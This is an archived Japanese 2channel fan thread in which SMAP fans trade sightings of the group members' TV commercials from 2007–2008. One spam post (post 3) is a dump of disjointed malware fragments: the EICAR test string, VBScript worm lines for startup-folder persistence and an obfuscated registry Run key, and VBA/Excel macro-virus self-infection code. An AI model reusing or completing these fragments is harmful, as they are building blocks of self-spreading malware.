5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

♪もっと見たいなCM♪【14】

1 :スマ姐さん:2007/09/18(火) 14:28:17 ID:9kKvBLTA
【前スレ】
♪もっと見たいなCM♪【13】
http://tv8.2ch.net/test/read.cgi/smap/1140513831/
【過去スレ】
♪もっと見たいなCM♪【12】
http://tv8.2ch.net/test/read.cgi/smap/1115807521/
♪もっと見たいなCM♪【11】
http://tv6.2ch.net/test/read.cgi/smap/1093602950/
♪もっと見たいなCM♪【10】
http://tv6.2ch.net/test/read.cgi/smap/1070297424/

2 :スマ姐さん:2007/09/18(火) 15:16:56 ID:xDCTawFG
>>1
乙カレー

3 :スマ姐さん:2007/09/18(火) 17:46:46 ID:9jGoc6rv
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub
܃ܷܵܶޫޭॢ

4 :スマ姐さん:2007/09/18(火) 17:53:42 ID:q0LkO5eb
【写真集】 新作写真集には6人目(ホワイト)の姿が。事務所側の肖像権クリアか!? ★3
http://love6.2ch.net/test/read.cgi/ehon/1177075814/

5 :スマ姐さん:2007/09/18(火) 18:53:17 ID:RYrp9oI0
>>1
乙です。

【前スレから最近の情報】
・9/23(日)15:00〜日テレ系でダンロップが冠のゴルフ中継
去年もこの中継でダンロップが一足先に流れた
・24日〜 明治 北海道チョコポテト(吾郎)


6 :スマ姐さん:2007/09/19(水) 21:21:31 ID:3eoVRHky
●捕獲しやすいと思われる番組
みかか東日本(土曜プレミアム、行列、他)※サイトに予定掲載有
ポカリ(スマステ、他) 
明治(昼みの、他)
日清(Mステ、金スマ、他)
富士通(車窓他)
トヨタ・トヨタレンタリース(地球紀行、月9他)
ギャツビー(スマスマ)
サンケイエクスプレス(スーパーニュース)※おそらく配達地区のみ
アリエール(スマスマ、Mステ他)
味の素(昼みの他)

●現在スポット的と思われるもの
ダンロップ、ニコン、WOWOW、ヤマサ醤油
地デジ、アクオス、アサヒビール

自分の最近の目撃談なので補足ヨロ

7 :スマ姐さん:2007/09/19(水) 23:40:51 ID:mtxwuSWu
>>1>>6
乙です

WOWOWは曜日忘れたけど報ステで捕獲出来る

地デジは夜中によく見る

アサヒビールは日9など

8 :スマ姐さん:2007/09/20(木) 01:12:16 ID:4yE77YTs
>>1 >>6 乙華麗です

>>6に補足して
●捕獲しやすいと思われる番組
明治(フジ月8HEY×3、テレ朝水9愛エプ、日テレ土9ドラマ枠)
ニコン(新作時にはTBS夕方イブニング5後半、報ステなど)
アリエール(13:30〜のフジ゙、TBS昼ドラ枠)
両方の筆頭スポンサーな上にフジは番組開始〜35分まで、
T*Sは35分頃に一回目のCM入るようなので比較的楽に捕獲できる。
味の素(いいとも)
アクオス(スマステ近辺)
WOWOW(報ステ月曜日スマスマの真裏orz)
ポカリスエット(スマステの他鉄腕ダッシュなど。HPにOA予定掲載)

9 :スマ姐さん:2007/09/20(木) 09:37:38 ID:hT4/EOc0
今日から剛のケンタッキーのCMが流れ始めた。
これからならいいともを張れば見れるかも。

10 :スマ姐さん:2007/09/20(木) 11:02:01 ID:RqnzG8em
木村ニコンも新CMあり
いいともは味の素、日清、ケンタとスマCMの宝庫だな

11 :スマ姐さん:2007/09/23(日) 04:09:16 ID:AjgSCLwD
捕獲できた張り込みポイントの報告です(`д´)ゞ

サンケイエクスプレス(タイムスタンプ付きで良ければめざましテレビに提供枠あり)
ニコン(今週高い確率ですぽると終了間際に来た。30秒も15秒も捕獲できた)

12 :スマ姐さん:2007/09/25(火) 01:34:44 ID:1qgF0JS/
質問なんだけど
プレイステーションポータブルってデクの頃の慎吾?よく似てるんだが後ろ姿でゲームしてるだけじゃわからん。

13 :スマ姐さん:2007/09/25(火) 08:50:46 ID:MNwGnga7
吾郎の明治北海道チョコポテト新CM開始。
ただし、関東以北のみ。

14 :スマ姐さん:2007/09/26(水) 08:27:16 ID:9JQt8NvZ
剛のヤマサ新CMが流れ始めたようだ。
>>13
関東じゃないけど、お茶とわさび地区だけどぷっすま見てたら流れたよ。


15 :スマ姐さん:2007/09/26(水) 21:34:07 ID:z+EeAZ7i
明治サイトに「関東(静岡を含む)」と書いてあったような。

16 :スマ姐さん:2007/09/30(日) 21:01:45 ID:XtGSd9jv
味の素の新しいの目撃
慎吾パパと慎吾ママと慎吾だった。

17 :スマ姐さん:2007/09/30(日) 23:59:43 ID:xOXYoNkr
正しくは、味の素マヨネーズ「こくうま」と「こくうま55%カット」だよ。
こくうまは、慎吾ぱぱ、まま、慎吾。55%カットは、慎吾ひとりだった。

18 :スマ姐さん:2007/10/01(月) 06:27:23 ID:HDSJ+aI4
NikonのCM.が 映画館で観れたよ HEROが始まる前に 大画面で良かった・・♪

19 :スマ姐さん:2007/10/01(月) 08:28:56 ID:+XE7/4Os
今確認。3人も1人も55%カットこくうまでした。

20 :スマ姐さん:2007/10/01(月) 16:00:02 ID:QVq0mqqv
今朝のめざにゅ〜で味の素冷凍食品エビシューマイの新CM目撃。
ストレッチリムジンに乗った慎吾に何故かさかなクンが付いてきた。

21 :スマ姐さん:2007/10/01(月) 16:20:40 ID:00juVsiy
あられごろもの和風チキン、とか言うアホのくせに威張るな。剛

22 :スマ姐さん:2007/10/01(月) 21:26:38 ID:00juVsiy
井上真央パンキーの猿CM不愉快との苦情で打ち切り
クイズパンキーから新バーsジョンに変わった猿が叫ぶCMから、猿が不愉快という
声があがった。深夜に猿だけは外してほしい。
歯をむき出してウキイイー!ウキキー!と鳴くあの猿がむかつく。
井上真央が猿の真似をして「キー!と鳴く演出など少し行き過ぎた・
OA当初から猿CMに関して規制の声が出ていた。

23 :スマ姐さん:2007/10/02(火) 02:38:22 ID:7BV/2r4B
昨日のネプリーグ特番の中で
味の素冷凍食品エビシューマイの新CM別バージョンも目撃。
中華円卓でシューマイ食う慎吾に、こちらももれなくさかなクンが付いてきた。

24 :スマ姐さん:2007/10/02(火) 16:49:46 ID:g3nvoYcs
絡むのは見事にB級タレントかお笑いばかり

25 :スマ姐さん:2007/10/05(金) 09:51:46 ID:7AzYZV2+
どん兵衛のゲームはテンキーじゃないときついな
社長の壁紙は遠いorz

26 :スマ姐さん:2007/10/07(日) 13:01:47 ID:fCbiXzve
キシリッシュの新しいのは宮里なんだね

27 :スマ姐さん:2007/10/07(日) 13:28:34 ID:CyTXgk8Q
SMAP全員で出そうなCM
トヨタ自動車(中居正広を除く)
明治製菓のカール、イソジン
アサヒビール
キリンビバレッジ
公共広告機構
郵便局


28 :スマ姐さん:2007/10/07(日) 13:36:15 ID:gCnD3cR+
>>27
(中居正広を除く)ってとこでもう全員じゃないだろ

29 :スマ姐さん:2007/10/07(日) 15:51:26 ID:YxtsvyxV
ID:CyTXgk8Q この人草ヲタで木村とか中居は嫌いみたい
他スレでも見た

30 :スマ姐さん:2007/10/07(日) 21:55:21 ID:13R7k/Yc
>>26
宮里のはキシリッシュ+Fで、普通のキシリッシュとは別の商品だよ。

31 :スマ姐さん:2007/10/08(月) 01:49:33 ID:sU5obpJR
ODAさん歌まで歌ってんだな…

32 :スマ姐さん:2007/10/08(月) 08:42:50 ID:uoHbUJAu
>>30
キシリッシュ 色々あるんですね!

33 :スマ姐さん:2007/10/11(木) 10:23:39 ID:i10nqRz2
中居のタイヤのCMは新しくなったみたいね。カッコイイ。

34 :スマ姐さん:2007/10/11(木) 13:51:48 ID:PnHEvuwx
ポカリCM新しいのないのかな

35 :スマ姐さん:2007/10/11(木) 18:06:50 ID:VZWqmSiU
私もポカリCM 新しいの待っていまぁーす! まだかなぁ

36 :スマ姐さん:2007/10/12(金) 04:50:34 ID:wHu/0GKM
イベントで撮影するんじゃないの?

37 :スマ姐さん:2007/10/17(水) 14:38:25 ID:PnjDNerk
吉岡&麻生がほのぼの夫婦に…ヤマサ新CM18日からOA
http://www.sanspo.com/geino/top/gt200710/gt2007101706.html
剛終了か。

38 :スマ姐さん:2007/10/17(水) 16:50:16 ID:Lj02nMkn
>>37
剛は「昆布ぽん酢およびその関連商品」担当。
その記事の商品は「昆布つゆ」って書いてあるだろが。

39 :スマ姐さん:2007/10/19(金) 04:15:01 ID:OLpGy05n
>>36
それただの噂じゃないの?

40 :スマ姐さん:2007/10/30(火) 01:01:58 ID:CYmM3sB1
森くんのオートレースのCMを目撃。

41 :スマ姐さん:2007/10/30(火) 06:36:11 ID:fP4WPv2T
>>37
昆布つゆは江守徹と中尾彬から吉岡&麻生に代わった。
昆布ぽん酢は剛継続

42 :スマ姐さん:2007/10/30(火) 15:30:54 ID:slCL/ZGk
>>40
どんなCM?

43 :スマ姐さん:2007/10/30(火) 19:58:44 ID:CYmM3sB1
>>42
突然だったからよく覚えてないんです。すいません。『森且之×〇〇(知らない人の名前)』って文字とあと森くんの顔がアップで映りました。説明下手でごめんなさい

44 :スマ姐さん:2007/10/30(火) 21:04:40 ID:slCL/ZGk
ありがトン
前もやってたけどそれと違うやつなのかなって思って

45 :スマ姐さん:2007/10/31(水) 13:46:11 ID:Uqp0XEWS
ダンロップ中居かっくいい

46 :スマ姐さん:2007/11/01(木) 06:34:31 ID:eWHcT7kK
ダンロップの中居は好き

47 :スマ姐さん:2007/11/03(土) 21:30:26 ID:MzGe36Nd
みかか殺陣のやつ、先週は随分みかけたのに捕獲しそこねてるうちに
公式の提供予定が中居の新しいのに変わってしまったorz

48 :スマ姐さん:2007/11/08(木) 01:14:25 ID:CAEhZ5vy
明治アーモンドチョコCM、中居だけだった
コンビ解消? 面白かったのに残念だ

49 :スマ姐さん:2007/11/08(木) 11:00:09 ID:/93nl2h1
>>48見て公式行ってきた。
チョコポテトとアーモンドチョコに分かれちゃったんだな。
面白かったからほんとに残念だ。
でも中居のポスター結構イイ(・∀・)b

50 :スマ姐さん:2007/11/12(月) 11:19:45 ID:n6WKwkBn
5人一緒のCMカモ〜ン

51 :スマ姐さん:2007/11/13(火) 08:06:16 ID:NKDg8NFz
キシリッシュの新しいの始まったね。
早速ゲットしようと思って公式行ったらまだうpされてなかった。

52 :スマ姐さん:2007/11/13(火) 13:01:56 ID:2xyCzgWm
今回のキシリッシュのCMの髪型は良い

53 :スマ姐さん:2007/11/16(金) 21:19:47 ID:6f0KaHM5
健康サララもどん兵衛も最後が違うのが流れてるんだね。
さくっと削除してから気づいた_| ̄|○

54 :スマ姐さん:2007/11/16(金) 22:10:10 ID:QpH1MOvB
どん兵衛は最後がレンジのともちうどんの2つは目撃した。
サララは気付かず削除したよ…

55 :スマ姐さん:2007/11/18(日) 16:30:59 ID:hifOBmNm
>>1

56 :スマ姐さん:2007/11/25(日) 01:05:11 ID:ZekGboGe
ニコンD300をスマステで目撃。


57 :スマ姐さん:2007/11/28(水) 23:08:05 ID:ycGMYnjm
木村のF905iのCM確認。

58 :スマ姐さん:2007/12/03(月) 00:21:17 ID:Ioa0W28T
ガンダムバージョンのどん兵衛CMを見たんだが中居は終わってないよな?

59 :スマ姐さん:2007/12/06(木) 20:53:55 ID:LaEeDqcq
これだな
ttp://donbei.jp/gundam/index.html

60 :スマ姐さん:2007/12/06(木) 20:58:36 ID:EHBFS+a4
ドワンゴいいじゃん

61 :スマ姐さん:2007/12/08(土) 18:29:12 ID:34mfGFUh
アスオス新ver.見た
今も昔も慎吾かわゆし

62 :スマ姐さん:2007/12/13(木) 17:14:38 ID:gko2oO36
>>58
終わってないよ

63 :スマ姐さん:2007/12/14(金) 11:21:03 ID:pNUITY0Y
スマ全員でのCMやって欲しい!
ところでポカリって終わっちゃったの?

64 :スマ姐さん:2007/12/14(金) 18:40:45 ID:hq4MfUCw
今年の広告批評のベスト10はスマCM入ってた?
今日23でやるけど

65 :スマ姐さん:2007/12/16(日) 11:27:41 ID:wq8G/3yG
>>63
冬Ver.始まったよ

66 :スマ姐さん:2007/12/17(月) 10:04:59 ID:W1svAhK9
始まったんだ
まだ見れてない

67 :スマ姐さん:2007/12/18(火) 08:57:41 ID:8KYkZxg4
自分も見れてない
誰のバージョンが流れてるの?

68 :スマ姐さん:2007/12/18(火) 09:51:59 ID:jVSq/xLC
>>67
確か自分が見たのは中居と吾郎が一緒に出てた

69 :スマ姐さん:2007/12/18(火) 12:26:07 ID:cvlMGMeP
CMにスマが出るだけでチャンネル変えるわwww
まじきめぇ


70 :スマ姐さん:2007/12/18(火) 12:39:52 ID:wl7H+hkJ
>>64
たぶん入ってなかった
サラッと見たから曖昧ですが

71 :スマ姐さん:2007/12/18(火) 15:16:26 ID:8KYkZxg4
>>68
ありがトン

72 :スマ姐さん:2007/12/19(水) 05:40:34 ID:Ojy1re1R
他メンバージョンが流れるのは来年かな

73 :スマ姐さん:2007/12/22(土) 09:21:32 ID:sFlURTti
ポカリ未だに1回も見れてないという

74 :スマ姐さん:2007/12/22(土) 10:47:31 ID:1R5IolMn
数日前のめざましで流れたよ。6:45すぎぐらい。

75 :スマ姐さん:2007/12/23(日) 12:26:22 ID:SXPmElT5
上京中なんだけどみかか中居&剛30秒バージョン見た
西日本住人だからテラウレシス…

76 :メリクリ:2007/12/24(月) 11:06:21 ID:oexUKF/F
>>75
今年西→東日本に引越してきたからすごいわかる
WSの枠ありやネットではなく、フツーにやってるのを見るとちょっと感動

77 :スマ姐さん:2007/12/28(金) 08:44:24 ID:c84hr9gR
あんまり流れてないよねポカリ

78 :スマ姐さん:2007/12/28(金) 17:35:33 ID:L/CH8Gap
>>75あの〜、その(みかか)って何でそんな名前でどんなことなのか是非教えてください。
2月まで学校であまり
テレビを観られない環境で…。2月卒業してからはSMAPのは全部拝見したいです。でも1月から
のドラマは録画します。

79 :スマ姐さん:2007/12/28(金) 20:19:16 ID:IUtxQYzF
>>78
質問スレで既出
あと改行を覚えてからきてくれ

80 :スマ姐さん:2007/12/29(土) 23:00:22 ID:HcJr9oTu
みかか、剛の里帰りver.が始まってるんだね

81 :スマ姐さん:2007/12/29(土) 23:24:47 ID:BP/jzKuq
>>79草履意地悪しないでちゃんと教えてやれよな。78さんNTTのパソコンの平仮名見てみて。

82 :スマ姐さん:2007/12/30(日) 11:56:18 ID:KoGJae4f
>>81
79だが誰と勘違いしてる?なんでも思い込みで決めるけるな。
みかかの話なんて散々既出なのに
初心者スレも読んでないようなお客に親切ぶって教える方がウザー

83 :スマ姐さん:2008/01/01(火) 18:33:51 ID:GKomz3uq
ダンロップ、ギタリスト中居のをたくさん目撃。
だいたい秋からやってる黄色いのが続けて流れる。

84 :スマ姐さん:2008/01/06(日) 02:28:17 ID:0wDR+wpF
みかか慎吾バージョンが始まったな。タカユキw

85 :スマ姐さん:2008/01/07(月) 00:26:20 ID:k3PiHmUQ
カズユキじゃね?

86 :スマ姐さん:2008/01/10(木) 18:43:25 ID:bsN9V5eu
光×Wiiか
慎吾がかわゆし

87 :スマ姐さん:2008/01/17(木) 23:08:42 ID:Ctg9euxi
今朝、地元スポ紙に木村のカローラ一面広告があった。
CMが新しくなるのかな?

88 :スマ姐さん:2008/01/22(火) 19:47:37 ID:2YJTLD+6
今チョコポテトのCM見たぞ@なぎゃー
今日からなのか?

89 :スマ姐さん:2008/01/22(火) 21:19:08 ID:rjJvpvWF
たこ焼き地区でも見たから西日本で流れてきてるね>チョコポテト

90 :スマ姐さん:2008/01/23(水) 21:53:52 ID:E5qZyZLe
やっと全国発売になったか

91 :スマ姐さん:2008/01/23(水) 22:12:04 ID:20Rf38Zq
新しいのじゃなくて今までの吾郎が踊るやつ?@関東

92 :スマ姐さん:2008/01/23(水) 23:08:04 ID:+TNkbwnL
髪が長いか今までのでしょう

93 :スマ姐さん:2008/01/24(木) 20:58:46 ID:jG7m9IC5
中居と剛とシベ超のは新作?

94 :スマ姐さん:2008/01/24(木) 21:01:18 ID:7/TlQcZI
みかかのハリウッド映画篇てやつなら去年からやってる。
詳しくは公式へGO

95 :スマ姐さん:2008/01/24(木) 21:13:37 ID:1Q3qA7Zv
しかし自分はそれはテレビでまだ目撃したことない。
慎吾のWiiより前からあったらしいんだが。

96 :スマ姐さん:2008/01/26(土) 01:17:13 ID:QyGUVRan
木村のカローラ フィールダーの新CM確認。

97 :スマ姐さん:2008/01/26(土) 11:27:10 ID:sHeLBlGy
ドコモの新しいのも確認。住宅街歩いてて水被るやつ。
昨日のワッツでいろんなCM撮影したと言っただけあるな。

98 :スマ姐さん:2008/01/26(土) 23:08:16 ID:xkpCTw+M
みかかハリウッド編、プレミアム枠で流れてた。

99 :スマ姐さん:2008/02/08(金) 20:09:13 ID:sbz1Bouw
キシリッシュの新しいの目撃

100 :スマ姐さん:2008/02/08(金) 21:37:00 ID:qxDeh3+O
まだギョーザ流れてるじゃねーか この野郎

101 :スマ姐さん:2008/02/08(金) 22:06:21 ID:WIhiRrck
おまえ餃子餃子ってうるせ〜よw

102 :スマ姐さん:2008/02/26(火) 01:48:03 ID:cDXNKLIr
テレビからそのまま〜って聞こえてきたから
何かと思ったら、みかか中居のCMだった

103 :スマ姐さん:2008/02/26(火) 20:35:01 ID:p7jGyPCW
同じくそのまま〜って聴こえてきたのでテレビ観たら
小人慎吾のを目撃した。そのあと中居と剛の
時代劇休憩のやつも流れたから前のと新しいのが
混在してる感じなのかな。

104 :スマ姐さん:2008/02/27(水) 13:45:25 ID:ZoJpR4FD
アサヒ本生新しいのが始まったね。
慎吾の声だけのverだけど。

関係ないけど、三○不動産のCMが流れるとついテレビを見てしまうのは漏れだけか?
みかかのほほえみの(ryと同じ曲使ってるからw

105 :スマ姐さん:2008/02/27(水) 22:02:10 ID:WotEQINO
NAKAI
KIMURA
INAGAKI
KUSANAGI
KATORI

メン全員愛があるな

106 :スマ姐さん:2008/02/27(水) 22:55:11 ID:Bl+vVcu0
みかかの小人な中居と慎吾
あれ、よく考えたら慎吾の方がかなりちっちゃいよなw

107 :スマ姐さん:2008/03/08(土) 12:02:37 ID:yL/M3WVB
本日の新聞折り込みチラシにみかかの大きなのが入ってた@時計台
去年黄色い背景で指さししてた5人それぞれの同じ写真で
背景は緑色に変えられてた。

108 :スマ姐さん:2008/03/08(土) 18:33:56 ID:GQoUmP4w
それは漏れのとこでは1週間くらい前に入ってたやつかも@お江戸朝日
ちょっと紙が厚手でいい感じのやつ。
今日は新しいverの広告が入ってた。
バックは淡いピンクで桜舞い散るって感じのでサイズは一面の半分。

109 :スマ姐さん:2008/03/09(日) 11:09:20 ID:1pCXRXst
今日その桜の広告が紙面に載ってた@時計台
見逃さずにすんだよ。情報d!

110 :スマ姐さん:2008/03/09(日) 13:11:31 ID:6VhsMpxY
慎吾のアサヒ、本人登場の新しいのになったね。

111 :スマ姐さん:2008/03/13(木) 00:40:27 ID:nVWNDNl2
中居吾郎のチョコ始まった

112 :スマ姐さん:2008/03/13(木) 21:40:37 ID:2Vhbhgtp
おもいっきりテレビでニコンの新CMやると紹介あった。

113 :スマ姐さん:2008/03/14(金) 21:32:12 ID:KM6UpFGT
ニコン、スパモニでさっそく目撃。

114 :スマ姐さん:2008/03/15(土) 22:31:24 ID:JRQDGKW2
木村も小人になりました

115 :スマ姐さん:2008/03/19(水) 11:50:25 ID:ZWMXQ/V+
ポカリ新CM、5人一緒の撮影だとメイキングも楽しめて嬉しい。

116 :スマ姐さん:2008/03/23(日) 00:32:26 ID:89VeDcxu
ぽかりのやつ好き

117 :スマ姐さん:2008/03/24(月) 10:30:41 ID:g7nUT18c
ポカリの新しいポスターがうpされたら前のがなくなったね。
先週中居の2枚目をゲトし忘れてたの気づいてよかった。
ポカリは提供枠でも30秒だけど、60秒は放送予定あるんだろうか?
公式からゲトした60秒は画質が悪くて満足できん。

118 :スマ姐さん:2008/03/24(月) 23:07:51 ID:toT1VSDi
今更ギャツビーが新しくなるとは思わなかった

119 :スマ姐さん:2008/03/25(火) 19:19:08 ID:/0MQBewr
顔にかけちゃって編はかわいい
楽しそうに踊ってて見てるこっちもニヤニヤ

120 :スマ姐さん:2008/03/28(金) 10:43:11 ID:FOQQwWNv
ポカリの60秒は昨日のサカーでの放送が唯一の放送だったのかな?
とくばんとかぶってたから事前に告知されてたけど逃した人多そう。

121 :スマ姐さん:2008/03/28(金) 21:14:35 ID:Xkt1h0Sl
>>120
今知ったorz

122 :スマ姐さん:2008/04/05(土) 23:26:55 ID:llAhY3tT
吾郎はバッグの中だった@みかか

123 :スマ姐さん:2008/04/06(日) 00:35:04 ID:XHMI2qG4
>>119
あの踊りちょっと下品に見える・・・

124 :スマ姐さん:2008/04/06(日) 08:28:51 ID:+tnNRsh+
>>123
そう? かわいいじゃん 
見てて楽しくなる

125 :スマ姐さん:2008/04/09(水) 00:52:01 ID:ZRUWmltb
ギャツビーの木村かわいいよ

126 :スマ姐さん:2008/04/17(木) 21:27:28 ID:zlFRAQSh
剛はピクニックバスケットの中だった@みかか
タコウインナー持ち上げてる大きさだからけっこう小さいような。
吾郎>中居>木村>剛≧慎吾ぐらいか?

127 :スマ姐さん:2008/04/22(火) 20:39:26 ID:0L8zmeo8
チョコ3人揃い踏みは母の日用?

128 :スマ姐さん:2008/05/01(木) 17:12:35 ID:pZMMK/VP
くりぃむナントカの枠ってスマCMの宝庫だね
昨日も木村カップ麺、剛洗剤、チョコ3人、ポカリやってた

129 :スマ姐さん:2008/05/17(土) 19:22:46 ID:o4JI5xYm
カレーうどんのどん兵衛社長はヅラだろうかw

130 :スマ姐さん:2008/05/23(金) 09:15:37 ID:hL0r7TMQ
FMVの新CM、木村の髪短いな。

131 :スマ姐さん:2008/06/21(土) 23:54:36 ID:qbXtxCZV
ドコモの新しいのを目撃。

132 :スマ姐さん:2008/07/24(木) 14:49:52 ID:V5wh2MXf
ポカリスエット・ビーチバレー編
7/26からOA

133 :スマ姐さん:2008/08/01(金) 19:49:28 ID:AJ/PyAIC
みかかの中居、最初気がつかなかったw

134 :スマ姐さん:2008/08/02(土) 20:58:54 ID:LneEpiK5
中居のみかかは4種類?
慎吾と剛のWiiのもあるね。

135 :スマ姐さん:2008/08/05(火) 20:18:56 ID:vtgUvtwr
新しいキシリッシュ、めざましで紹介されてたね。

22 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)